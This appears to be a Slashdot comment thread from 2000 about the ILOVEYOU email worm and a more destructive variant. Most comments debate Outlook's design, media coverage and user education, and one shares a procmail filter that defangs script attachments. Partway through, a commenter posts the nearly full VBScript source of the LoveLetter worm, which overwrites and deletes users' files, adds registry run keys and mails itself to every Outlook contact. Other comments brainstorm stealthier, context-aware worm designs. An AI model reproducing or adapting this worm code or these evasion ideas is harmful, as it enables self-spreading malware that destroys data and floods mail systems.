The filetype -- it contains the file type which says what kind of data is in the file.
The creator -- which identifies the application that created the file, and which should be used to work with the file.
Applications have a file type of 'APPL' and the creator field identifies the application; that is, it is what ends up in the "creator" field of files generated by this application.
Additionnal trivia: Beige toaster files are, in fact, divided in two. There is a data fork , and a ressource fork . The ressource fork contains information that can be easily edited by a resource editor program, allowing to change certain aspects of, say, an executable file, like the icons, fonts, sounds and strings it uses. The data fork contains, well... (drum roll) data... (In the case of an APPLication, it is the actual binary code. GUI details are in the ressource fork). Either (of both) of those data fork can be of zero length.
It is not a bad system, except that it is totally shielded from lusers and, although it can prevent them from doing mayhem on their filesystems, it is a royal pain in the ass to change if you don't have the proper utilities.
I suppose it could be desirable to have a filesystem that allows you to have as many forks on your files as you want (did I hear somewhere that Windoze NT has something like that? Or is it Novell?), but in my opinion, nothing beats the simplicity of a "flat file" filesystem such as we enjoy so much on Linux.
However, I still don't dislike the concept of embedding file type information and whatnot within the directory entry/fdn.
--
Here's my mirror
-Erf C.
-Erf C.
Cthulu always calls collect...
You can't possibly consider a virus writer to be an artist? I'm sure that some of code they produce is elegant, or at least quite advanced and technical. But to call the result of that work 'art' is just fallacy.
Unfortunately, destruction is creative.
-- iCEBaLM
Hi all,
I have been dismayed at the media's recent coverage of the "love bug" and its new varient - which is being reported on today.
In particular I have been seriously disappointed by the BBC's inappropriate coverage of the prerequisite conditions for this "virus" to operate.
1). A computer system running a recent Microsoft windows operating system is required.
2). The user must use the Microsoft Outlook e-mail client.
3). The user must have the Windows SCripting Host (WSH) installed.
This so called virus only affects a small percentage of computer users and the media needs to point this out. Microsoft have taken the wrong course of corrective action - as usual.
I have telehponed the BBC this evening with regard to this - if you are a reporter from the BBC reading this, please contact me personally for any further clarification required.
--
Jonathan.
http://www.jonmasters.org/
This is a quickie script to straighten out VBA, VBS, and JS attachments. Happy Hacking:
/usr/bin/formail -i "X-Loop:viruscheck"
/^content-disposition\:/i) { /^content-type\:/i) {
#This goes in procmailrc:
:0 Bf
*!^X-Loop: viruscheck
*^Content-Disposition:.+
|/sbin/noiloveyou |
:0:
$ORGMAIL
#!/usr/bin/perl
#This is "/sbin/noiloveyou"
while() {
$temp=$_;
if ($temp =~
print $temp;
$temp = ;
$temp =~ s/\.vbs/_vbs\.txt/i;
$temp =~ s/\.vba/_vba\.txt/i;
$temp =~ s/\.js/_js\.txt/i;
print $temp;
next;
}
if ($temp =~
$temp =~ s/application\/x-javascript/text\/plain; charset\=us-ascii/;
print $temp;
$temp = ;
$temp =~ s/\.vbs/_vbs\.txt/i;
$temp =~ s/\.vba/_vba\.txt/i;
$temp =~ s/\.js/_js\.txt/i;
print $temp;
next;
}
print $temp;
}
#This should at least slow it down a little #bit....
# Jacques Richer -- jricher@bankri.com
The icon is different, but most users wouldn't notice. The default icon for a VBS file is a document with a picture of a scroll on it (perhaps an ancient Greek "script"?), whereas the default icon for a text file is a document with some lines of text on them. The script doesn't look identical, but most users won't know the difference.
For more information, click here.
Here.
i wish that the *name* of the virus could be :-)
something that would be *very* embarrassing
to say on CNN or CSPAN...
It would need to be subtle (so that the embarrassing thing would be said enough times
to take hold
-fb Everything not expressly forbidden is now mandatory.
if the program was a .exe, the user would manually have to execute it. same if it was a UNIX binary. Yes, users are very stupid, and they will do this, but not to nearly the extent that the .vbs scripts get executed, because lookout automatically executes them... Hey, that makes me wonder... if the user associated the .vbs extension with say, notepad, would it automatically run it, or just run it in notepad? that may be something to try...
Think that was flamebait? You've obviously never met me in person...
$email=~tr/.@/
Because they CAN.
It's the same reason the jocks in my neighborhood put used bubblegum on all the crosswalk push-buttons: they won't be around to see someone suffer, and they're certainly not getting anything out of the experience, but they KNOW they're ruining someone's day, and that's enough.
It's the same reason teenagers pour acid on cars in random parking lots belonging to people they don't even know: they certainly won't see the people they've just caused thousands of dollars of damage to (in fact, if they DO see them, they've failed) - but nonetheless, the damage has been done.
It's the same reason people put cyanide into asprin bottles at the supermarket: They have no clue who will get hit, but SOMEONE'S life is going to be ruined by their actions, and that's enough.
If this is the only means people have to demonstrate to themselves and to the universe that they matter, that their actions have had SOME affect on other people, then they'll do it. People need to believe that they matter, even if it's as monsters.
People do it because, fundamentally, it's FUN to screw the other guy over. There's an inherent human need to make other people worse than you - after all; life's effectively a zero-sum game, so making everyone else worse-off is just as effective as making yourself better-off, and oftentimes easier to do.
-Hentai [in vita non pacem est]
This was inevitable, the interesting thing about this virus is that it morphs as well as changing the subject, well according to this BBC report. What we need is a foolproof of making users check what they are doing when they use their computer, to ensure all the files don't get deleted.....oh.....wait a minute, isn't that what Linux is for?
Win2k is in dumb mode by default. I'm still trying to figure out how to see extensions under Win2k. RTFM would probly solve this problem, but what fun would that be?
Another question: it can't be too hard to change the linking in Windoze for .vbs so they don't run at all (ie have them be considered text files). It seems strange that I have not seen instructions like "change this item in your Registry to fix all the virii." Is this change impossible, or perhaps it would break too many other programs, or what? How about a .vbs wrapper that pops up a question box (and maybe examines the code for stuff that reads/writes files or does anything with mail) before executing it?
No no no.. I'm not saying my friends are dumb, but in terms of computer-stuff some of them just know how to email people.
Many people I asked said they never got one.
It could be, we aren't connected by few degrees to the corporate world.. which seems to be the most hit with the virus =)
Yap. Shame the 'big guys' in the office (boss, VP of IT, or prez) makes the decisions and sometimes is stubborn about it.
Now i'm wondering how many staunch MS people will switch from outlook to something like eudora, or netscape mail.
Oh well. I'll stick with pine, and if there is some pine vulnerability, i'll go to Elm. If Elm.. then.. i'll telnet to the sendmail port and do it in RAW mode. =)
Oh, and if i was head of a company, i'd switch everyone to RAW mode in that case =)))
Is if the virus/worm was one of these LookOut ones:
"MSNBC reports today that a virus by the name of 'MSNBC' is causing havok on the net, overloading mail servers around the world. Only persons using MS Outlook are can be infected."
I suppose I should thank MS for making me giggle several times a day. *giggles* -- See?
Akardam Out
"Hi Mr Bunny Wabbit!"
Certainly not this worm, which doesn't read any executables.
A real virus spreads by opening other executables and inserting its code into them. It most likely reads its own code from memory, not from disk... how would this prevent any virus activity?
1) People who don't use Outlook -and- Windows. The mail client, then, would be intelligent.
2) Intelligent *people* who may use that combo, but don't open those type of attachments, have turned off auto-open, etc.
The third group is people like me who haven't gotten the virus, no matter what OS & client they run.
Ceterum censeo Microsoftam esse delendam.
Pretty much Rob Rosenberger's theme at the Computer Virus Myths page. I post that here in case a few of you haven't discovered it.
Mambo dogface in the banana patch
I saw at least 15 slightly different variants of the last one, and they're just trickling off. And this one's a lot nastier than the last. If anyone gets a copy of the script, I'd love to see it... need to know if what I have in place to stop it will keep working with this one. (first post?)
Anyone that thinks Linux is immune from virii is a moron. These are just simple attachments that dumb people run on their machine.
:)
Yes, but no Unix mailer I've ever used exectuted attached scripts directly. If you want to run an attachment, you save it, chmod+x it, then run it. It takes a very deliberate effort, and even then it would be very hard for a script to propogate itself easily, given the numerous mailers used out there (netscape, pine, mutt, elm, exmh, etc). And it's damage would be limited to the user's home directory: no risk to the system as a whole. And if they come running to you, crying and hoping to get their precious data back, you can laugh at them and say "Well, next time don't run executables people send you!" I like being a BOFH.
BEWARE! You may be the next victim of the latest variant of the ILOVEYOU worm, the "Honor System" worm.
.vbs attachments was disabled. .vbs attachments was not disabled, but the user was not stupid enough open executable attachments to e-mail even after repeated warnings not to do so. .vbs attachments was not disabled, but none of the user's friends were dumb enough to have run the worm and send it to them in the first place.
.vbs worms. This worm will spread itself though virtually every e-mail client capable of forwarding messages (so far the list includes eudora, pine, netscape messenger, lotus notes and outlook). Additionally, this worm is capable of destroying files on virtually any Operating System that allows ordinary users to delete critical system files (ok, really this is only Windows and maybe MacOS). If you suspect you have received a copy of the Honor System worm:
This worm attacks users that were previously unaffected by the ILOVEYOU worms because either:
a) They were not running Microsoft Windows.
b) They were running Windows, but not Outlook.
c) They were running Windows and Outlook, but execution of
d) They were running Windows and Outlook and execution of
e) They were running Windows and Outlook and execution of
Background:
Users across the globe have been affected by the spread of the so-called "ILOVEYOU" worm and it's copy-cat variants. These worms rely on gaping security holes in the Microsoft Outlook e-mail client, as well as the incredible stupidity of users who open executable attachments without first detaching them and scanning for known viruses, despite repeated warnings not to do this.
IT departments have been scrambling to combat the spread of malicious e-mail attachment worms by setting up filtering at firewalls, updating anti-virus software, alerting users not to open e-mail attachments and even taking down mail servers in some cases as a defensive measure. Anti-virus companies like Symantec and McAffee are working round the clock to identify new strains of these worms and to develop countermeasures to identify and filter out these malicious e-mail attachments.
The US Congress is extremely concerned about the problem. The global e-commerce infrastructure is threatened by 14-year old hackers who can bring the entire internet to a halt by writing visual basic scripts which sens themselves to other users and then corrupt users' computer files. Hearings have been held to determine the best way to combat this new menace. Clearly, it is these cyber-terrorist-vandals who are to blame, and not the security model of Microsoft's Office products. After all, why wuldn't you want to allow executable e-mail attachments to have free-reign over any and all files on the user's computer?
Seeing that this problem is not the result of inferior software design, but in fact because of 14-year old hackers, it was a simple matter of time before someone developed a worm that was able to attack users who previously were not affected by the ILOVEYOU worms. The result is the "Honor System" worm. This new worm is far more destructive than it's visual basic scripted cousins, as it does not rely on any Operating System or Application-specific vulnerability to spread itself and cause damage to users' computers. Instead, this new worm relies completely on the ability to socially-engineer the user into spreading the worm. Truly this is the work of evil 14-year old hackers at their worst.
How it works:
The user receives an email from someone they know with the following text:
This is the Honor System worm. Please forward
this message to everyone you know, then delete
a random selection of critically important files
from your system.
What to do:
This worm has the potential to be far more destructive than previous
DO NOT forward the message to anyone!
DO NOT delete any critical system files from your computer!
REPORT the attack to your system administrator immediately!
If you follow these instructions you can protect yourself for this latest malicious attack by 14-year-old hackers and help stop the spread of this insidious mutation of the ILOVEYOU worm that laid waste most of the internet last week. Thank you.
There is much cruelty in the universe, John.
Yeah, we seem to have the tour map.
Do any virus writers read Slashdot? And if so, would any of you care to explain *why* you do it? Ignoring the simple macro viruses, some stuff, especially the polymorphic ones are incredilbly clever pieces of code. Why put that talent to waste?
Now weary traveller, rest your head. For just like me, you're utterly dead.
Someone will make another, more destructive, sneakier version of the trojan worm (hey, it's a trojan horse and a worm; the next version may be a virulent trojan worm...). They'll have VBSs that generate EXEs, and vice versa, they'll take the boot sector with a virus that can relaunch the worm, they'll display amusing animations (grabbed from who-cares-where) that make the infected user think he's received a typical funny/annoying attachment.
Windows system admins: batten down the hatches! Trap all attachments and personally filter them. Get the managers to enact a strict "no unnecessary attachment" rule. Delete all "amusing" attachments and Word documents that should have been plain text (or could have been as HTML in the body), and send a nasty letter to whoever sent it.
This is, to some degree, a stupid MS problem. There are things that could have made worms like this harder to spread. However, something similar to this could work in Linux, too, given a sufficiently large ignorant user base (though it might be harder to write). If the user is dumb enough to be tricked into running anything you send him, there's no technological fix for it.
There are three possible solutions: supervise the users (as suggested above), educate the users, or tie the users' hands, so they can't do anything but use a small set of applications and move around certain types of documents. The first is a prohibitively expensive short-term fix, the latter two are long-term solutions: the second is better, but perhaps unrealistic; the third can't be done with current software, a change to some operating environment is needed (tweaking a shell for Linux should do it, though perhaps a change to the kernel would be better: create a sub-user login that has the same sort of access to a single user account as a user can have to the root account with "sudo"; sort of a weak capabilities system). I think both of the latter two are needed: you need to tie new or casual users' hands so they can't do too much damage, and at the same time you need to gradually educate them to the point where you don't have to watch them anymore.
You can't just ignore user ignorance. You have to make them take the bus until they learn how to drive without causing a 30-car pileup, and give them a ride when the bus doesn't go where they are headed. Don't ignore that just because they whine that the bus is slower.
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
"male" ? Omg ! It's JeffK that's behind it !!!!
/. posts stories every day about corporations raping everything they can get their grubby little paws on. DCMA, UCITA ... and these are just GEEK issues.
This sort of thing can be considered a sort of direct action.
support gun control: take guns from cops
ah - I knew all that.
/. primer on this a few months back).
I just wanted to know if AppleScript could make Outlook it's bitch as well as VBS does. In my dream world, where Macs have 50% marketshare, this type of TH might spread faster due to people not being able to easily distinguish between executable content or regular attachments, (by looking for the ".vbs" extension) if AppleScript (compiled) didn't have any visible means of identification (type; APPL).
Forks: Yes pain in the ass to edit resource forks if you don't have the proper tools. The proper tools are freely available on Apple's site, and most Mac compilers also ship with Res Edit, etc. The equvalent data on PCs are much more difficult to edit after the fact (resources in DLLs) OS X will use a different scheme, an application will actually be a special type of FOLDER, which contains the discreet files and resources. In Finder, this will still be hidden from the user, because that special folder will be unopenable. (I think there was a
NT *does* indeed have something similar to forks, called streams on NTFS. Too FUCKING bad, nobody was smart enough to write a protocol that preserved Mac resource forks when copying them to an NTFS volume by putting them into a stream. You copy a Mac file to NTFS, and NT treats it the same way DOS 1.0 does, it blindly, stupidly, erases critical data. (so does Unix, and every other OS except Novell). Seems like an obvious idea. Streams have been around since NT 3.5, but they are not used for anything other than storing security attributes for files - which in other OS-es, are stored as part of the file system, instead.
I'm in agreement with you about "flat file" systems, if only for universal interoperability purposes, and I think Apple is too, which is why they are abandoning it and going to the system they are for OS X - the Finder will keep users out of the dangerous areas, and treat application folders as files, which is great, IMHO, from a useability standpoint. From a power-user wanting to muck with things, use a special tool to get at them and edit them (like res-edit), or go in using the shell, duh! The command line still lets you get into those folders and see all the nifty contents. Things only an engineer could appreciate, should only be accesible to engineers. My mother in law doesn't need to open up an application folder, see ten million dlls and binaries (and subfolders), and try to figure out which one is the executable.
I just remembered this old Metallica song. . .
These are my friends, See how they glisten. See this one shine, how he smiles in the light.
http://www.hoe.nu/text/hoe-0935.txt
Thanks.
-Mogel
You need to warn end users of these other potenial security holes in Windows: Files ending with: .wsf - windows script (can execute commands) .lnk - execute program (can execute programs) .scr - screen saver (full executable) .reg - registry (can add, modify, or delete anything in user's registry) .js - javascript .jse - javascript .hta - html application
What are you talking about, Micro$haft IS the main stream... ;-)
Fish
Some people have too much time. To take a virus that caused internation panic among Outlook users, then upgrade it to do more damage while being more covert is just messed up. Although I have to admit, It's funny. Which is a stupid way for an outlook user to view it.
I think that Outlook has some good features outside of the sexy graphical interface. For one thing, it does what good programs should do- it automates simple, repetitious tasks without making you jump through hoops. Outlook collects email addresses that I reply to, so that if I need to write someone that I don't know the email address for off the top of my head, I have it without any work. Outlook also does a pretty good job of building several useful features into one program- the calander, contact manager, task list, and mail client. Sometimes it is good to keep things like that seperate, but in this case I have found it to be beneficial. It also connects with my Palm Pilot and syncs everything automatically, which is useful since I use both of them to keep track of things. And as for accessing email from anywhere, it's easy to just tell outlook to leave your messages on the server. So when I am at home, I can use outlook for whatever I want. When I'm elsewhere, I telnet into my unix account and read mail with pine. There's no need of only using one or the other. They both serve their purpose.
Found this on a mailinglist I'm on... just thought it was relevant :)
.signature virus that works for a very small
/usr/ucb/vi on the panix /usr/bin/vi claims to be bug-for-bug
/virus!$/w >> .signature : Eli's vi modeline .signature virus!
--- START QUOTE ---
Years ago (after one of the first Word macro viruses came to my
attention) I wrote a
set of Unix configurations.
If a person gets the virus, and they reply with the body quoted,
and they use a "true" vi with modelines enabled, then the virus
appends itself to ~/.signature. (The
suns is a "true" vi; the
compatable with a "true" vi, but does not allow modelines.)
vi:
I posted it to comp.editors and I remember someone writing an
emacs equivilent.
Vi modelines are only effective if in the first or last five lines
of a file. Some versions of vi insist on them being indented.
Elijah
--- END QUOTE ---
Ok got tired of waiting for someone to do this so I did it myself.... http://www.geocities.com/vbs_virus_protect/ Simple... Disable all VBS, JS, WSH, and HTA files by sending them to Notepad instead of executing them. If you need to run it you can do it from the command prompt.. Take a look... I have a .exe coming monday. 8> -g
Personally, I use Pine on a 10,000 user unix machine.
I have YET to recieve ANY of the 'vbs' email worms in any email i've ever recieved.
I'm on numerous email lists, with friends from all over, hence i'd expect to at least recieve one.
I have not recieved any of the melissa, iloveyou, or variants.
Not a single one.
I can only assume i'm not alone, but if I and others are in the same situation, does this not mean that the virus isn't as widespread as people say it is?
IF it was, i think all us pine/elm/etc users should recieve something... and get a good laugh.
Jesus, man, just point him to a dictionary site like dictionary.msn.com/find/entry .asp?search=virus where he can see the proper plural form within three seconds, rather than wallowing through that mental masturbatory dreck that Mr. Christiansen wrote. I hope he's not reading this, 'cause I'm not looking to offend him, but after skimming that page, I can see why people don't exactly consider Mr. Christiansen to be "well-liked."
Cheers,
ZicoKnows@hotmail.com
During the last couple of months, firms like ISS had a huge increase in sales. With the Love Bug and copycat viruses I'm sure the AV companies are also seeing increased profits. I wonder how much @stake consulting rates are for helping a firm defend against this sort of thing. I'm sure they're not cheap.
More race stuff in one place,
than any one place on the net.
Maybe the reason that dumb people can write devastating viruses is because they are dumb. Although I'm not suggesting that the writer of the infamous Internet Worm is dumb, his virus/worm was meant to be harmless and its devastating consequences happened by accident rather than by design.
The lameness filter doesn't like this...
rem barok -loveletter(vbe)
rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Mic
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs"
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cu
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cu
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Mic
if (downread="") then
downread="c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKhjnwerh
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflf
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~koichi/jf6TRjkcbGR
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~chu/sdgfhjksdfjklN
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cu
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"\")
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eqfolderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&"\script.
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1=
scriptini.WriteLine "n2=
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
sub spreadtoemail()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,reg
set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\Softwar
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\Softwa
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
male.Attachments.Add(dirsystem&"\LOVE-LETTER-FO
male.Send
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malea
end if
x=x+1
next
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.A
else
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.A
end if
next
Set out=Nothing
Set mapi=Nothing
end sub
sub html
On Error Resume Next
dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1="LOVELETTER - HTML"&vbcrlf& _
""&vbcrlf& _
""&vbcrlf& _
""&vbcrlf& _
"
This HTML file need ActiveX Control
To Enable to read this HTML fileh r(91)) c hr(93)) h r(37)) Y OU.HTM") U .HTM",2)
- Please press #-#YES#-# button to Enable ActiveX"&vbcrlf& _
"----------z--------------------z---------- "&vbcrlf& _
""&vbcrlf& _
""&vbcrlf& _
""&vbcrlf& _
""&vbcrlf& _
""&vbcrlf& _
""&vbcrlf& _
""
dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'")
dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""")
dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")
dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\")
dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'")
dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""")
dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/")
dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\")
set fso=CreateObject("Scripting.FileSystemObject")
set c=fso.OpenTextFile(WScript.ScriptFullName,1)
lines=Split(c.ReadAll,vbcrlf)
l1=ubound(lines)
for n=0 to ubound(lines)
lines(n)=replace(lines(n),"'",chr(91)+chr(45)+c
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+
lines(n)=replace(lines(n),"\",chr(37)+chr(45)+c
if (l1=n) then
lines(n)=chr(34)+lines(n)+chr(34)
else
lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _"
end if
next
set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-
b.close
set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YO
d.write dt5
d.write join(lines,vbcrlf)
d.write vbcrlf
d.write dt6
d.close
end sub
Bullshit. It is a virus AND a worm. Viruses have payloads. If this was only a worm it would just propagate without a payload, tying up network resources.
fslg503-985-8686503-985-8686503-985-8686503-985-8
If this kind of thing interests you, id did these two cartoons surounding the original love-bug virus. 6th May, 8th May.
So use Eudora Pro! You'll get:
Overall a much better alternative to Outlook Express and M$.
TheGeek
TheGeek
http://www.geekrights.org
Kill the monkey
The changing subject line helps its messages avoid being deleted by the Spam filters, but since the message does not change, the user is not likely to thinkt that it actually came from the person it says it does. What these viruses need to do is examine the context of all of the messages in the user's Inbox that come from the individual who it is being sent to and generate a context-sensitive reply to that individual.
In addition, these viruses will ultimately not be limited to VBA. A program could easily open the default Netscape inbox text file and scan for the @ character--extracting all e-mail addresses in the entire Inbox file. The virus could also discriminate against which users it destructively effects--deleting only the files of people whose identity says they are in the aol.com domain, for instance.
I think that we have only seen the tip of the iceberg as far as intelligent viruses that are distributed by e-mail.
When run on wscript.exe and cscript.exe (the Windows scripting hosts responsible for VBScript execution) that will display a warning that the script could contain a virus.
SlashMirror: Where to put files for fellow /.'ers
SlashMirror: Where to put files for fellow /.'ers
The next version in this stepwise trojan refinement will automatically begin a Debian install after the Winblows files are deleted. Microsoft tactics hit the mainstream!
-L
So if you're so concerned with the bandwidth on the infected machine, have the virus code monitor CPU usage and network bandwidth and restrict its own usage to, say, ten percent of maximum or less. This makes it both less destructive - you wouldn't be shutting down anyone's machine, just redirecting otherwise unused CPU cycles - and more stealthy too.
If one criterion for the "success" of a virus or worm is the scope of its circulation, then it seems to me the guy who wrote this latest thing is screwing up. (Or more likely, he just hacked a few changes onto some existing code, probably ILOVEYOU, sure wish someone would post this new one so I could have a look at it.) This is entirely aside from the incomprehensible malice that's displayed by such a nasty payload, what a jerk. You're sure going to notice when something wipes practically all the files on your PC. It seems to me that a really well-written virus would be more subtle.
Yours WDK - WKiernan@concentric.net
...and write a trojan horse that changes all the Windows error messages.
For example, the GPF message: Another fine general protection fault, brought to you by the folks at M$! (little animated GIF of chibi Bill Gates dancing in a pile of money, throwing up handfuls of bills)
Sounds like a great idea!
I use windows and will never get affected. Why? Because I don't use outlook, I use good old Eudora. In fact I've been using Eudora since version 1.x and never been bothered by an email attachment.
.vbs files as executables with explorer, have notepad open them instead. You keep the useful scripting and end up with harmless text files.
I'm suprised no one has even thought of not associating
Only the State obtains its revenue by coercion. - Murray Rothbard
What really gets me is the anguish and tormented sounding voices and inflections that reporters use on TV and radio when they report on virii/worms like Melissa and ILOVEYOU.
Today's media is run almost entirely off of emotion. I could take the typical hour long evening broadcast and condense it down to about 5 minutes if I filtered out all the emotion.
Do you think they'll ever learn?
As I remember, back in their early days, McAfee (later Network Associates), paid money for previously undiscovered viruses. They may have been doing exactly what you described, though with (arguably) better intentions.
> Pursuing the biological simile, observers pointed out another problem caused by Microsoft's monopoly: the lack of genetic diversity in the PC ecosystem.
Perhaps. However, for better or worse, diversity is in direct competition with standards compliance.
I'm all for diversity, at least in principle, but at some level it is always going to be desirable for me to be able to read files that you wrote, and for me to be able to run programs that you wrote (even if I have to recompile them first), and for me to be able to transport those files/programs from your system to mine. So long as these things are possible, viruses and worms will also be possible.
The problem here is the unmanaged automation of those otherwise desirable manifestations of interoperability.
What we really need as a first line of defense isn't diversity. It is for a certain vendor to realize that just because an idea can be implemented doesn't mean that it should be implemented. For a second line of defense, we need a public (or at least the tribe of sysadmins) to realize that just because a feature can be used/enabled doesn't mean that it should be used/enabled.
I am sure that there will be worms and viruses as long as there are bugs in security features, but meanwhile there is no point in making life easy for the script kiddies.
For better or worse, those who have been blaming the problem on stupidity - whether of the users or of their vendors - have it right.
I happen to like the idea that Joe Cluebie can play with a computer, which is why I advocate eradicating vendor stupidity as the first line of defense. Alas, when the world's largest vendor is Clueless, Inc., and willfully unwilling to obtain a clue, we may have to fall back on the 2LoD and train Joe Cluebie for self defense instead.
--
Sheesh, evil *and* a jerk. -- Jade
;-)
-- Your Servant,
Your Servant, B. Baggins
>Yes, I could write a bash script or perl script
/bin/sh and /bin/rm don't they?
/w Outlook's design, but I'll never say "that could never happen here" because it's too much like tempting fate.
>that deletes files. Guess what, not everyone uses
>bash and has perl on their unix system, and if
>they did, it would only delete their user files,
>and NO system files would be affected.
Well, you could find a *nix common denominator, i.e. pretty much everything has a
My 2 cents: we shouldn't get too complacent about this type of thing. Another nasty *nix worm/virus of some sort is probably inevitable. The more that people celebrate the problems that MS is having right now, the harder we're all going to have our noses rubbed in it when the next Morris worm comes around.
I'll gladly criticize problems
if they'd released it near Valentine's Day :)
========================
63,000 bugs in the code, 63,000 bugs,
ya get 1 whacked with a service pack,
--- Grow a pair, liberals... stop letting the Republicans bully you!
I would suggest that this virus will be much less disruptive than the 'Love Bug' simply because after the initial infection, there are not any files left to infect.
So, the stupid ones will stop sending mail to the rest of us!
Of course it is, just like writing any other code. The same way that designing a nuclear bomb is physics.
